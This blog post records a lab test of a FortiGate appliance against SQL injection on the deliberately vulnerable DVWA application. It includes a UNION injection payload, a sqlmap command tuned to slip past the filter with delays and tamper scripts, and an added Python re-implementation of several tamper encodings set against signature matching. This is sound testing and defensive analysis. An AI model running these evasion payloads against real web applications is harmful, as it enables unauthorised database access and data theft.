Hacking Fortinet – SQLI test (English Version)

Those who follow me on Facebook and Twitter know that I have recently taken a particular interest in Fortinet, because it is one of the security devices with the strongest market position in the region.

Another reason is that in my pentest projects, whenever I was told that this device was in place protecting the servers, I never had problems with my attacks being blocked.

Last week, together with my friend Alexis Torres, a colleague in the pentest area and a specialist in Fortinet solutions, we carried out some offensive security tests to validate the security rules when the device protects a web application against attacks.

For the tests we used a properly configured FortiGate 60D appliance.

The goal was to verify whether the appliance actually blocks attacks when protecting a web application. Alexis, as the Fortinet solutions specialist, did the configuration; the idea was to make the testing rigorous.

The test setup consisted of a deliberately vulnerable web application, DVWA, protected by the FortiGate 60D appliance.

Developing the attacks:

As you know, SQL injection (SQLi) vulnerabilities are the most common in web applications; this is confirmed by their first place in the OWASP Top 10.

With the vulnerable application (DVWA) we first performed a very simple SQLi attack:

' union select 1 -- 

Surprise: Fortinet detected the SQL pattern and blocked it.

The rule that detected the attack was "http.uri.sql.injection", which obviously does not say much about its inner workings; the vendor keeps that a well-guarded secret.


We did not give up and developed more elaborate attacks with sqlmap, the tool par excellence for SQLi.

However, it was obvious that if the sqlmap attack were sent without any customization it would be easy prey for Fortinet.

We added some modifications to the attack:

Speed:

--threads=1, we limited the maximum number of concurrent requests to 1
--delay=60, a 60-second delay between each SQLi request

Obfuscation:

--technique U, we specified the UNION query technique
--batch, skips the interactive Y/N prompts by taking the default answers
--tamper, we specified the tamper script used to obfuscate the SQLi payload strings

sqlmap has a wide variety of them, like a pharmacy shelf:

space2hash.py
space2morehash.py
space2mssqlblank.py
space2mysqlblank.py
charencode.py
chardoubleencode.py
charunicodeencode.py

The syntax of the attack we sent is:

python sqlmap.py --url="http://192.168.19.253/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d0fa0f05f0b714c18b3ba3ebace3f450" -v 3 --dbms "MySQL" --technique U -p id --batch --threads=1 --delay=60 --tamper "space2mysqldash.py"
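As an added example (not from the original post, and not sqlmap's own code), the following Python re-implements the transformation behind four of the tamper scripts listed above, including the space2mysqldash.py used in the command, and runs the payload from the first test through two inspection strategies: a "union select" signature matched against the raw URI value, and the same signature matched after URL-decoding and comment stripping. The tamper bodies, the signature regex and the normalisation steps are this example's own assumptions about how such engines work; they are not a description of Fortinet's http.uri.sql.injection rule, whose internals the post notes are not public.

```python
import re
from urllib.parse import unquote

# The payload the post sends by hand against DVWA (constructed sample input).
PAYLOAD = "' union select 1 -- "

# --- Tamper functions, re-implemented here after the idea of sqlmap's scripts ---
# These are not sqlmap's own code; they reproduce the transformation each script
# performs so the effect on the wire can be seen without running sqlmap.

def space2comment(payload: str) -> str:
    """Replace every space with an inline comment; '/**/' is whitespace to the parser."""
    return payload.replace(" ", "/**/")

def space2mysqldash(payload: str) -> str:
    """Replace every space with '--' plus a URL-encoded newline. MySQL treats
    '--<whitespace>' as a comment to end of line, so the newline ends the comment
    and the query text resumes. This is the script the sqlmap command above uses."""
    return payload.replace(" ", "--%0A")

def space2hash(payload: str, token: str = "nVNaVoPYeva") -> str:
    """Replace every space with '#<junk>' and a newline (MySQL '#' comment).
    sqlmap randomises the junk token; a fixed one is used here so results are stable."""
    return payload.replace(" ", "%23" + token + "%0A")

def charencode(payload: str) -> str:
    """URL-encode every character, including ones that need no encoding."""
    return "".join("%%%02X" % ord(c) for c in payload)

# --- Two inspection strategies (assumed, for illustration) ---
# The same signature applied to the raw URI value, and applied after the
# decoding and normalisation a real inspection engine has to perform.

SIGNATURE = re.compile(r"union\s+select", re.IGNORECASE)

def naive_match(uri_value: str) -> bool:
    """Match the signature against the raw, undecoded parameter value."""
    return SIGNATURE.search(uri_value) is not None

def normalize(uri_value: str) -> str:
    """Canonicalise before matching: URL-decode until stable (catches double
    encoding), turn SQL comments back into whitespace, collapse whitespace runs."""
    s = uri_value
    for _ in range(4):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)  # /* ... */ inline comments
    s = re.sub(r"(--|#)[^\n]*\n", " ", s)               # '-- ...' and '# ...' up to newline
    return re.sub(r"\s+", " ", s).strip()

def normalized_match(uri_value: str) -> bool:
    """Match the signature against the canonical form of the value."""
    return SIGNATURE.search(normalize(uri_value)) is not None

def compare(payload: str = PAYLOAD) -> dict:
    """For each tamper, report the wire form and whether each matcher fires."""
    tampers = {
        "none": lambda p: p,
        "space2comment": space2comment,
        "space2mysqldash": space2mysqldash,
        "space2hash": space2hash,
        "charencode": charencode,
    }
    return {
        name: {"wire": fn(payload),
               "naive": naive_match(fn(payload)),
               "normalized": normalized_match(fn(payload))}
        for name, fn in tampers.items()
    }

if __name__ == "__main__":
    for name, result in compare().items():
        print(f"{name:16} naive={result['naive']!s:5} "
              f"normalized={result['normalized']!s:5} {result['wire']}")
```

Every tamper defeats the raw-string signature, and none of them survives decoding plus comment stripping; that is the gap the tamper scripts exploit, and closing it is what separates an engine that inspects the URI literally from one that inspects what the database will actually parse.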

After a long time (because, as indicated, we had slowed the attack down), surprise, surprise: the device detected and blocked the attack for every payload sqlmap sent.


Well, obviously this was a good result for Alexis but not for me in my role as attacker. From the protection perspective it is good to know that the device does its job, although the following factors need to be considered:

1. Proper configuration
As indicated, I developed the tests with a specialist in the brand, not merely someone enabling or disabling rules and settings, as most companies and implementers do.

It is also important that an attack specialist plays the other side of the scenario (the offensive test), so that both sides are covered, offensive and defensive security testing, and the configuration can be confirmed to be appropriate.


2. Regarding the tests
From a pentester's perspective it is not possible to assume that the device offers perfect security against SQLi. Bearing in mind that the web application used is well known for its insecurity, in this scenario the device was effective, but more tests and other web scenarios are needed before feeling satisfied.

In the future I hope to develop other offensive security tests, such as XSS, session hijacking, and others.

Greetings,
Juan Oliva
@jroliva

This entry was posted in Manuals and tutorials by jroliva.

About jroliva

Juan Oliva is an information security and IP telephony consultant with 10 years of experience in the field. He is heavily involved in penetration testing projects, vulnerability analysis and exploitation, social engineering tests, physical security, code review, and other information security tasks. He also delivers VoIP implementation and maintenance projects based on Asterisk and Elastix, call center projects, cloud and hosted PBX solutions, and hardening of Linux and Windows platforms. He has worked for a variety of companies, delivering projects for the Peruvian state as well as for private entities, both national and foreign, and holds current certifications in Ethical Hacking, Linux and IP telephony. He is an instructor of Ethical Hacking courses and of certifications such as Linux Professional Institute and Elastix, and has delivered training in Peru and abroad. He is a vulnerability researcher and content creator whose work is published on his personal blog, jroliva.wordpress.com, which he has maintained for more than 6 years.

One thought on "Hacking Fortinet – SQLI test (English Version)"

1. Pingback: Hacking fortinet – bypassing UTM (English version) | Juan Oliva
